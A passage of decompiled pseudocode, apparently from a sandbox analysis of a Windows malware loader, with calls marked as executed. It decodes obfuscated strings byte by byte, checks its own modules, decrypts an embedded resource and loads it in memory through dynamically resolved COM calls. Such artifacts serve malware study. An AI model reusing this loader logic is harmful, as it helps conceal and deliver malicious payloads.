                                                                                                                                                                                                          				_t494 = __edx;
                                                                                                                                                                                                          				__imp__OleInitialize(0); // executed
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x23)) = 6;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                                                                                                                                                          				 *((char*)(_t556 + 0x38)) = 0;
                                                                                                                                                                                                          				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                                                                                                                                                          				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                                                                                                                                                          				_t557 = _t556 + 0xc;
                                                                                                                                                                                                          				if(_t337 == 0x41b2a0) {
                                                                                                                                                                                                          					L80:
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                                                                                                          					_t525 = _t340;
                                                                                                                                                                                                          					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x84)) = 0;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                                                                                                                                                          					 *((char*)(_t557 + 0x38)) = 0;
                                                                                                                                                                                                          					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                                                                                                                                                          					if(_t341 == 0) {
                                                                                                                                                                                                          						L38:
                                                                                                                                                                                                          						FindCloseChangeNotification(_t525); // executed
                                                                                                                                                                                                          						_t526 = GetModuleHandleA(0);
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                                                                                                                                                          						 *((char*)(_t557 + 0x3c)) = 0;
                                                                                                                                                                                                          						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                                                                                                                                                          						_t558 = _t557 + 8;
                                                                                                                                                                                                          						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                                                                                                                                                          						 *(_t558 + 0x50) = _t536;
                                                                                                                                                                                                          						_t551 = LoadResource(_t526, _t536);
                                                                                                                                                                                                          						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                                                                                                                                                          						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                                                                                                                                                          						_push(0x40022);
                                                                                                                                                                                                          						_t537 = _t349; // executed
                                                                                                                                                                                                          						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                                                                                                                                                          						_t559 = _t558 + 8;
                                                                                                                                                                                                          						 *(_t559 + 0x34) = _t350;
                                                                                                                                                                                                          						__eflags = _t350;
                                                                                                                                                                                                          						if(_t350 == 0) {
                                                                                                                                                                                                          							 *(_t559 + 0x50) = 0;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                                                                                                                                                          							_t486 =  *(_t559 + 0x40);
                                                                                                                                                                                                          							_t559 = _t559 + 0xc;
                                                                                                                                                                                                          							 *(_t559 + 0x50) = _t486;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E00401300( *(_t559 + 0x50));
                                                                                                                                                                                                          						_t497 =  *(_t559 + 0x48);
                                                                                                                                                                                                          						_t352 = SizeofResource(_t526, _t497);
                                                                                                                                                                                                          						 *(_t559 + 0x40) = _t352;
                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                          						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                                                                                                                                                          						__eflags = _t354;
                                                                                                                                                                                                          						if(_t354 > 0) {
                                                                                                                                                                                                          							_t519 =  *(_t559 + 0x3c);
                                                                                                                                                                                                          							_t482 = _t537 - _t519;
                                                                                                                                                                                                          							__eflags = _t482;
                                                                                                                                                                                                          							 *(_t559 + 0x34) = _t519;
                                                                                                                                                                                                          							 *(_t559 + 0x88) = _t482;
                                                                                                                                                                                                          							 *(_t559 + 0x38) = _t354;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t424 =  *(_t559 + 0x34);
                                                                                                                                                                                                          								_push( *(_t559 + 0x88) + _t424);
                                                                                                                                                                                                          								_push(0x400);
                                                                                                                                                                                                          								_push(_t424);
                                                                                                                                                                                                          								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                                                                                                                                                          								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                                                                                                                                                          								_t179 = _t559 + 0x38;
                                                                                                                                                                                                          								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                                                                                                                                                          								__eflags =  *_t179;
                                                                                                                                                                                                          							} while ( *_t179 != 0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                                                                                                                                                          						__eflags = _t448;
                                                                                                                                                                                                          						if(_t448 < 0) {
                                                                                                                                                                                                          							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                                                                                                                                                          							__eflags = _t448;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _t448;
                                                                                                                                                                                                          						if(_t448 > 0) {
                                                                                                                                                                                                          							_t421 =  *(_t559 + 0x40) - _t448;
                                                                                                                                                                                                          							_push(_t421 + _t537);
                                                                                                                                                                                                          							_push(_t448);
                                                                                                                                                                                                          							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                                                                                                                                                          							__eflags = _t422;
                                                                                                                                                                                                          							_push(_t422);
                                                                                                                                                                                                          							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                                                                                                                                                          						_t560 = _t559 + 0xc;
                                                                                                                                                                                                          						FreeResource(_t551);
                                                                                                                                                                                                          						_t552 =  *_t537;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                                                                                                                                                          						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                                                                                                                                                          						_t561 = _t560 + 4;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                                                                                                                                                          						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                                                                                                                                                          						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                                                                                                                                                          						_t192 = _t537 + 4; // 0x4
                                                                                                                                                                                                          						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                                                                                                                                                          						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                                                                                                                                                          						_t528 = _t527 + 0xe;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                                                                                                                                                          						 *((char*)(_t561 + 0x54)) = 0;
                                                                                                                                                                                                          						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                                                                                                                                                          						_t562 = _t561 + 0x24;
                                                                                                                                                                                                          						_t365 = LoadLibraryA(_t364); // executed
                                                                                                                                                                                                          						_t538 = _t365;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                                                                                                                                                          						_t451 = _t562 + 0x134;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                                                                                                                                                          						 *((char*)(_t562 + 0x38)) = 0;
                                                                                                                                                                                                          						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                                                                                                                                                          						_t563 = _t562 + 8;
                                                                                                                                                                                                          						_t367 = GetProcAddress(_t365, _t366);
                                                                                                                                                                                                          						__eflags = _t367;
                                                                                                                                                                                                          						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                                                                                                                                                          						__eflags = _t452;
                                                                                                                                                                                                          						 *(_t563 + 0x47) = _t452 == 0;
                                                                                                                                                                                                          						 *0x423480 = _t367;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                                                                                                                                                          						 *(_t563 + 0x58) = 0;
                                                                                                                                                                                                          						 *(_t563 + 0x54) = 0;
                                                                                                                                                                                                          						__eflags = _t452;
                                                                                                                                                                                                          						if(_t452 != 0) {
                                                                                                                                                                                                          							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                                                                                                                                                          							__eflags = _t368;
                                                                                                                                                                                                          							if(_t368 >= 0) {
                                                                                                                                                                                                          								__eflags =  *(_t563 + 0x47);
                                                                                                                                                                                                          								if( *(_t563 + 0x47) == 0) {
                                                                                                                                                                                                          									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                                                                                                                                                          									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                                                                                                                                                          									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                                                                                                                                                          									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                                                                                                                                                          									__eflags = _t378;
                                                                                                                                                                                                          									if(_t378 >= 0) {
                                                                                                                                                                                                          										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                                                                                                                                                          										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                                                                                                                                                          										__eflags = _t383;
                                                                                                                                                                                                          										if(_t383 >= 0) {
                                                                                                                                                                                                          											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                                                                                                                                                          											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                                                                                                                                                          											__eflags = _t385;
                                                                                                                                                                                                          											if(_t385 >= 0) {
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                                                                                                                                                          												E00401870(_t563 + 0x44, _t552, "_._");
                                                                                                                                                                                                          												_t539 = __imp__#8;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                                                                                                                                                          												 *_t539(_t563 + 0x94);
                                                                                                                                                                                                          												E00401870(_t563 + 0x3c, _t552, "___");
                                                                                                                                                                                                          												 *_t539(_t563 + 0xa4);
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                                                                                                                                                          												_t542 =  *(_t563 + 0x58);
                                                                                                                                                                                                          												__eflags = _t542;
                                                                                                                                                                                                          												if(_t542 == 0) {
                                                                                                                                                                                                          													E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                                                                                                                                                          												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                                                                                                                                                          												_t543 = _t396;
                                                                                                                                                                                                          												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                                                                                                                                                          												__imp__#23(_t543, _t563 + 0x48);
                                                                                                                                                                                                          												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                                                                                                                                                          												_t564 = _t563 + 0xc;
                                                                                                                                                                                                          												__imp__#24(_t543);
                                                                                                                                                                                                          												_t399 =  *(_t564 + 0x54);
                                                                                                                                                                                                          												__eflags = _t399;
                                                                                                                                                                                                          												if(_t399 == 0) {
                                                                                                                                                                                                          													_t399 = E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                                                                                                                                                          												__eflags = _t543;
                                                                                                                                                                                                          												if(_t543 != 0) {
                                                                                                                                                                                                          													__imp__#16(_t543);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t402 =  *(_t564 + 0x34);
                                                                                                                                                                                                          												__eflags = _t402;
                                                                                                                                                                                                          												if(_t402 == 0) {
                                                                                                                                                                                                          													_t402 = E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t469 =  *(_t564 + 0x40);
                                                                                                                                                                                                          												_t555 = _t402;
                                                                                                                                                                                                          												__eflags = _t469;
                                                                                                                                                                                                          												if(_t469 == 0) {
                                                                                                                                                                                                          													_t531 = 0;
                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t531 =  *_t469;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                                                                                                                                                          												__imp__#411(0xc, 0, 0);
                                                                                                                                                                                                          												_t471 =  *(_t564 + 0x3c);
                                                                                                                                                                                                          												__eflags = _t471;
                                                                                                                                                                                                          												if(_t471 == 0) {
                                                                                                                                                                                                          													E0040AD90(0x80004003);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t405 =  *(_t564 + 0x38);
                                                                                                                                                                                                          												__eflags = _t405;
                                                                                                                                                                                                          												if(_t405 == 0) {
                                                                                                                                                                                                          													_t514 = 0;
                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t514 =  *_t405;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t563 = _t564 - 0x10;
                                                                                                                                                                                                          												_t407 = _t563;
                                                                                                                                                                                                          												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                                                                                                                                                          												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                          												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                                                                                                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                                                                                                                                                          												_t538 = __imp__#9; // 0x742dcf00
                                                                                                                                                                                                          												_t538->i(_t563 + 0xa4);
                                                                                                                                                                                                          												E004019A0(_t563 + 0x38);
